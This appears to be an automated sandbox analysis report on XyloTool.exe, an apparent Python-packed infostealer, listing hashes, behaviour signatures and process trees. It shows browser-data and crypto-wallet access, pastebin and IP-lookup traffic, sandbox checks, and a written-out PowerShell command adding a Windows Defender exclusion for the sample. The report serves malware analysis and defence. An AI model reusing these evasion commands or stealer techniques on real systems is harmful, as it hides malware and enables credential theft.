Analysis
-
max time kernel
595s -
max time network
625s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
22-06-2024 19:04
Behavioral task
behavioral1
Sample
XyloTool.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
XyloTool.exe
Resource
win10v2004-20240611-en
General
-
Target
XyloTool.exe
-
Size
5.9MB
-
MD5
1bae503880fbeb67ea0df79e4123eb3f
-
SHA1
66f88a8d04503aa36f97153271e756b184915cfd
-
SHA256
6ba55b8fc0d8a37a2d5942c54d86c267d38fc4bd4bc1339dde80190ddf800980
-
SHA512
bea868f8215a69ff0f72a67b04cb0eeb3030b1c830c700ca29b61f1e38ccddb5401ae3285b9101d3998480a31a8e7a5fe053ad2b464de6ffdfea36cda403e663
-
SSDEEP
98304:zN+nhj832i65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeF29hGkr/LcQ:zAn4EDOYjJlpZstQoS9Hf12VKXpbGC0E
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3512 powershell.exe 2396 powershell.exe 8072 powershell.exe 7024 powershell.exe 1564 powershell.exe 4924 powershell.exe 7648 powershell.exe 6728 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
Processes:
rar.exewinrar-x64-701.exeXyloTool.exeXyloTool.exerar.exeXyloTool.exeXyloTool.exerar.exeXyloTool.exeXyloTool.exerar.exeXyloTool.exeXyloTool.exepid process 2028 rar.exe 2000 winrar-x64-701.exe 4836 XyloTool.exe 7928 XyloTool.exe 8420 rar.exe 7888 XyloTool.exe 3152 XyloTool.exe 7688 rar.exe 8912 XyloTool.exe 9056 XyloTool.exe 7260 rar.exe 8480 XyloTool.exe 8308 XyloTool.exe -
Loads dropped DLL 64 IoCs
Processes:
XyloTool.exeXyloTool.exeXyloTool.exeXyloTool.exepid process 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 4188 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 7928 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 3152 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe 9056 XyloTool.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI50922\python310.dll upx behavioral2/memory/4188-25-0x00007FF9E2A00000-0x00007FF9E2E65000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\libffi-7.dll upx behavioral2/memory/4188-32-0x00007FF9F6F80000-0x00007FF9F6F8F000-memory.dmp upx behavioral2/memory/4188-31-0x00007FF9F63C0000-0x00007FF9F63E4000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50922\libssl-1_1.dll upx behavioral2/memory/4188-54-0x00007FF9F2220000-0x00007FF9F224C000-memory.dmp upx behavioral2/memory/4188-56-0x00007FF9F2510000-0x00007FF9F2528000-memory.dmp upx behavioral2/memory/4188-60-0x00007FF9E2490000-0x00007FF9E2601000-memory.dmp upx behavioral2/memory/4188-59-0x00007FF9F20F0000-0x00007FF9F210E000-memory.dmp upx behavioral2/memory/4188-64-0x00007FF9F6300000-0x00007FF9F630D000-memory.dmp upx behavioral2/memory/4188-63-0x00007FF9F20D0000-0x00007FF9F20E9000-memory.dmp upx behavioral2/memory/4188-66-0x00007FF9F1FD0000-0x00007FF9F1FFE000-memory.dmp upx behavioral2/memory/4188-72-0x00007FF9E2110000-0x00007FF9E2487000-memory.dmp upx behavioral2/memory/4188-73-0x00007FF9E2A00000-0x00007FF9E2E65000-memory.dmp upx behavioral2/memory/4188-70-0x00007FF9F1630000-0x00007FF9F16E7000-memory.dmp upx behavioral2/memory/4188-75-0x00007FF9F20B0000-0x00007FF9F20C5000-memory.dmp upx behavioral2/memory/4188-78-0x00007FF9F2B80000-0x00007FF9F2B8D000-memory.dmp upx behavioral2/memory/4188-80-0x00007FF9E1D90000-0x00007FF9E1EA8000-memory.dmp upx behavioral2/memory/4188-77-0x00007FF9F63C0000-0x00007FF9F63E4000-memory.dmp upx behavioral2/memory/4188-264-0x00007FF9F20F0000-0x00007FF9F210E000-memory.dmp upx behavioral2/memory/4188-265-0x00007FF9E2490000-0x00007FF9E2601000-memory.dmp upx behavioral2/memory/4188-266-0x00007FF9F20D0000-0x00007FF9F20E9000-memory.dmp upx behavioral2/memory/4188-288-0x00007FF9F63C0000-0x00007FF9F63E4000-memory.dmp upx behavioral2/memory/4188-297-0x00007FF9F1630000-0x00007FF9F16E7000-memory.dmp upx behavioral2/memory/4188-298-0x00007FF9E2110000-0x00007FF9E2487000-memory.dmp upx behavioral2/memory/4188-296-0x00007FF9F1FD0000-0x00007FF9F1FFE000-memory.dmp upx behavioral2/memory/4188-287-0x00007FF9E2A00000-0x00007FF9E2E65000-memory.dmp upx behavioral2/memory/4188-302-0x00007FF9E2A00000-0x00007FF9E2E65000-memory.dmp upx behavioral2/memory/4188-317-0x00007FF9E2110000-0x00007FF9E2487000-memory.dmp upx behavioral2/memory/4188-330-0x00007FF9E1D90000-0x00007FF9E1EA8000-memory.dmp upx behavioral2/memory/4188-329-0x00007FF9F2B80000-0x00007FF9F2B8D000-memory.dmp upx behavioral2/memory/4188-328-0x00007FF9F20B0000-0x00007FF9F20C5000-memory.dmp upx behavioral2/memory/4188-327-0x00007FF9F1630000-0x00007FF9F16E7000-memory.dmp upx behavioral2/memory/4188-326-0x00007FF9F1FD0000-0x00007FF9F1FFE000-memory.dmp upx behavioral2/memory/4188-325-0x00007FF9F20D0000-0x00007FF9F20E9000-memory.dmp upx behavioral2/memory/4188-324-0x00007FF9F6300000-0x00007FF9F630D000-memory.dmp upx behavioral2/memory/4188-323-0x00007FF9E2490000-0x00007FF9E2601000-memory.dmp upx behavioral2/memory/4188-322-0x00007FF9F20F0000-0x00007FF9F210E000-memory.dmp upx behavioral2/memory/4188-321-0x00007FF9F2510000-0x00007FF9F2528000-memory.dmp upx behavioral2/memory/4188-320-0x00007FF9F2220000-0x00007FF9F224C000-memory.dmp upx behavioral2/memory/4188-319-0x00007FF9F6F80000-0x00007FF9F6F8F000-memory.dmp upx behavioral2/memory/4188-318-0x00007FF9F63C0000-0x00007FF9F63E4000-memory.dmp upx behavioral2/memory/7928-4056-0x00007FF9E22E0000-0x00007FF9E2745000-memory.dmp upx behavioral2/memory/7928-4058-0x00007FF9F9410000-0x00007FF9F941F000-memory.dmp upx behavioral2/memory/7928-4057-0x00007FF9F20C0000-0x00007FF9F20E4000-memory.dmp upx behavioral2/memory/7928-4063-0x00007FF9F1DF0000-0x00007FF9F1E1C000-memory.dmp upx behavioral2/memory/7928-4066-0x00007FF9E1FC0000-0x00007FF9E2131000-memory.dmp upx behavioral2/memory/7928-4065-0x00007FF9F1CA0000-0x00007FF9F1CBE000-memory.dmp upx behavioral2/memory/7928-4064-0x00007FF9F1DD0000-0x00007FF9F1DE8000-memory.dmp upx behavioral2/memory/7928-4068-0x00007FF9F6F70000-0x00007FF9F6F7D000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 100 pastebin.com 101 pastebin.com 889 pastebin.com 890 pastebin.com 97 pastebin.com 99 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 29 ip-api.com 881 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exedescription ioc process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exefirefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe -
Detects videocard installed 1 TTPs 4 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 3236 WMIC.exe 3392 WMIC.exe 4784 WMIC.exe 1616 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 12 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 1140 tasklist.exe 9016 tasklist.exe 7304 tasklist.exe 3244 tasklist.exe 4688 tasklist.exe 752 tasklist.exe 2800 tasklist.exe 7120 tasklist.exe 9076 tasklist.exe 8352 tasklist.exe 2172 tasklist.exe 3524 tasklist.exe -
Gathers system information 1 TTPs 4 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exesysteminfo.exesysteminfo.exepid process 112 systeminfo.exe 3260 systeminfo.exe 5132 systeminfo.exe 1780 systeminfo.exe -
Modifies registry class 3 IoCs
Processes:
firefox.exeOpenWith.exetaskmgr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings taskmgr.exe -
NTFS ADS 2 IoCs
Processes:
firefox.exedescription ioc process File created C:\Users\Admin\Downloads\XyloTool.rar:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\winrar-x64-701.exe:Zone.Identifier firefox.exe -
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
NOTEPAD.EXENOTEPAD.EXEpid process 8164 NOTEPAD.EXE 7700 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 2396 powershell.exe 2396 powershell.exe 4136 powershell.exe 4136 powershell.exe 2396 powershell.exe 2396 powershell.exe 1564 powershell.exe 1564 powershell.exe 4136 powershell.exe 1564 powershell.exe 3064 powershell.exe 3064 powershell.exe 5036 powershell.exe 5036 powershell.exe 1712 powershell.exe 1712 powershell.exe 1656 powershell.exe 1656 powershell.exe 8072 powershell.exe 8072 powershell.exe 3276 powershell.exe 3276 powershell.exe 8072 powershell.exe 3276 powershell.exe 6500 powershell.exe 6500 powershell.exe 6500 powershell.exe 4924 powershell.exe 4924 powershell.exe 4924 powershell.exe 9004 powershell.exe 9004 powershell.exe 9004 powershell.exe 9184 powershell.exe 9184 powershell.exe 9184 powershell.exe 8632 powershell.exe 8632 powershell.exe 8632 powershell.exe 1524 powershell.exe 1524 powershell.exe 1524 powershell.exe 8924 powershell.exe 8924 powershell.exe 7024 powershell.exe 7024 powershell.exe 8924 powershell.exe 8924 powershell.exe 7024 powershell.exe 7024 powershell.exe 8272 powershell.exe 8272 powershell.exe 7648 powershell.exe 7648 powershell.exe 8272 powershell.exe 7648 powershell.exe 8216 powershell.exe 8216 powershell.exe 8216 powershell.exe 3124 powershell.exe 3124 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
OpenWith.exe7zFM.exetaskmgr.exepid process 8144 OpenWith.exe 7336 7zFM.exe 8212 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exepowershell.exetasklist.exepowershell.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3524 tasklist.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 752 tasklist.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeIncreaseQuotaPrivilege 1184 WMIC.exe Token: SeSecurityPrivilege 1184 WMIC.exe Token: SeTakeOwnershipPrivilege 1184 WMIC.exe Token: SeLoadDriverPrivilege 1184 WMIC.exe Token: SeSystemProfilePrivilege 1184 WMIC.exe Token: SeSystemtimePrivilege 1184 WMIC.exe Token: SeProfSingleProcessPrivilege 1184 WMIC.exe Token: SeIncBasePriorityPrivilege 1184 WMIC.exe Token: SeCreatePagefilePrivilege 1184 WMIC.exe Token: SeBackupPrivilege 1184 WMIC.exe Token: SeRestorePrivilege 1184 WMIC.exe Token: SeShutdownPrivilege 1184 WMIC.exe Token: SeDebugPrivilege 1184 WMIC.exe Token: SeSystemEnvironmentPrivilege 1184 WMIC.exe Token: SeRemoteShutdownPrivilege 1184 WMIC.exe Token: SeUndockPrivilege 1184 WMIC.exe Token: SeManageVolumePrivilege 1184 WMIC.exe Token: 33 1184 WMIC.exe Token: 34 1184 WMIC.exe Token: 35 1184 WMIC.exe Token: 36 1184 WMIC.exe Token: SeDebugPrivilege 2800 tasklist.exe Token: SeIncreaseQuotaPrivilege 1184 WMIC.exe Token: SeSecurityPrivilege 1184 WMIC.exe Token: SeTakeOwnershipPrivilege 1184 WMIC.exe Token: SeLoadDriverPrivilege 1184 WMIC.exe Token: SeSystemProfilePrivilege 1184 WMIC.exe Token: SeSystemtimePrivilege 1184 WMIC.exe Token: SeProfSingleProcessPrivilege 1184 WMIC.exe Token: SeIncBasePriorityPrivilege 1184 WMIC.exe Token: SeCreatePagefilePrivilege 1184 WMIC.exe Token: SeBackupPrivilege 1184 WMIC.exe Token: SeRestorePrivilege 1184 WMIC.exe Token: SeShutdownPrivilege 1184 WMIC.exe Token: SeDebugPrivilege 1184 WMIC.exe Token: SeSystemEnvironmentPrivilege 1184 WMIC.exe Token: SeRemoteShutdownPrivilege 1184 WMIC.exe Token: SeUndockPrivilege 1184 WMIC.exe Token: SeManageVolumePrivilege 1184 WMIC.exe Token: 33 1184 WMIC.exe Token: 34 1184 WMIC.exe Token: 35 1184 WMIC.exe Token: 36 1184 WMIC.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeIncreaseQuotaPrivilege 1848 WMIC.exe Token: SeSecurityPrivilege 1848 WMIC.exe Token: SeTakeOwnershipPrivilege 1848 WMIC.exe Token: SeLoadDriverPrivilege 1848 WMIC.exe Token: SeSystemProfilePrivilege 1848 WMIC.exe Token: SeSystemtimePrivilege 1848 WMIC.exe Token: SeProfSingleProcessPrivilege 1848 WMIC.exe Token: SeIncBasePriorityPrivilege 1848 WMIC.exe Token: SeCreatePagefilePrivilege 1848 WMIC.exe Token: SeBackupPrivilege 1848 WMIC.exe Token: SeRestorePrivilege 1848 WMIC.exe Token: SeShutdownPrivilege 1848 WMIC.exe Token: SeDebugPrivilege 1848 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
firefox.exe7zFM.exetaskmgr.exepid process 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 7336 7zFM.exe 7336 7zFM.exe 7336 7zFM.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe -
Suspicious use of SendNotifyMessage 63 IoCs
Processes:
firefox.exetaskmgr.exepid process 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe 8212 taskmgr.exe -
Suspicious use of SetWindowsHookEx 47 IoCs
Processes:
firefox.exeOpenWith.exewinrar-x64-701.exepid process 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 8144 OpenWith.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 4044 firefox.exe 2000 winrar-x64-701.exe 2000 winrar-x64-701.exe 2000 winrar-x64-701.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
XyloTool.exeXyloTool.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exepowershell.execmd.exedescription pid process target process PID 5092 wrote to memory of 4188 5092 XyloTool.exe XyloTool.exe PID 5092 wrote to memory of 4188 5092 XyloTool.exe XyloTool.exe PID 4188 wrote to memory of 1588 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 1588 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 3588 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 3588 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 804 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 804 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 624 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 624 4188 XyloTool.exe cmd.exe PID 3588 wrote to memory of 1792 3588 cmd.exe powershell.exe PID 3588 wrote to memory of 1792 3588 cmd.exe powershell.exe PID 624 wrote to memory of 3524 624 cmd.exe tasklist.exe PID 624 wrote to memory of 3524 624 cmd.exe tasklist.exe PID 804 wrote to memory of 752 804 cmd.exe tasklist.exe PID 804 wrote to memory of 752 804 cmd.exe tasklist.exe PID 4188 wrote to memory of 3624 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 3624 4188 XyloTool.exe cmd.exe PID 1588 wrote to memory of 2396 1588 cmd.exe powershell.exe PID 1588 wrote to memory of 2396 1588 cmd.exe powershell.exe PID 4188 wrote to memory of 644 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 644 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 5072 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 5072 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 2176 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 2176 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 5036 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 5036 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 1424 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 1424 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 2872 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 2872 4188 XyloTool.exe cmd.exe PID 3624 wrote to memory of 1184 3624 cmd.exe WMIC.exe PID 3624 wrote to memory of 1184 3624 cmd.exe WMIC.exe PID 644 wrote to memory of 2800 644 cmd.exe tasklist.exe PID 644 wrote to memory of 2800 644 cmd.exe tasklist.exe PID 5072 wrote to memory of 4136 5072 cmd.exe powershell.exe PID 5072 wrote to memory of 4136 5072 cmd.exe powershell.exe PID 5036 wrote to memory of 1676 5036 cmd.exe netsh.exe PID 5036 wrote to memory of 1676 5036 cmd.exe netsh.exe PID 2872 wrote to memory of 1564 2872 cmd.exe powershell.exe PID 2872 wrote to memory of 1564 2872 cmd.exe powershell.exe PID 2176 wrote to memory of 4928 2176 cmd.exe tree.com PID 2176 wrote to memory of 4928 2176 cmd.exe tree.com PID 1424 wrote to memory of 112 1424 cmd.exe systeminfo.exe PID 1424 wrote to memory of 112 1424 cmd.exe systeminfo.exe PID 4188 wrote to memory of 2736 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 2736 4188 XyloTool.exe cmd.exe PID 2736 wrote to memory of 1740 2736 cmd.exe tree.com PID 2736 wrote to memory of 1740 2736 cmd.exe tree.com PID 4188 wrote to memory of 3236 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 3236 4188 XyloTool.exe cmd.exe PID 3236 wrote to memory of 1196 3236 cmd.exe tree.com PID 3236 wrote to memory of 1196 3236 cmd.exe tree.com PID 4188 wrote to memory of 4440 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 4440 4188 XyloTool.exe cmd.exe PID 4440 wrote to memory of 1648 4440 cmd.exe tree.com PID 4440 wrote to memory of 1648 4440 cmd.exe tree.com PID 1564 wrote to memory of 4428 1564 powershell.exe csc.exe PID 1564 wrote to memory of 4428 1564 powershell.exe csc.exe PID 4188 wrote to memory of 2756 4188 XyloTool.exe cmd.exe PID 4188 wrote to memory of 2756 4188 XyloTool.exe cmd.exe PID 2756 wrote to memory of 1760 2756 cmd.exe tree.com PID 2756 wrote to memory of 1760 2756 cmd.exe tree.com -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
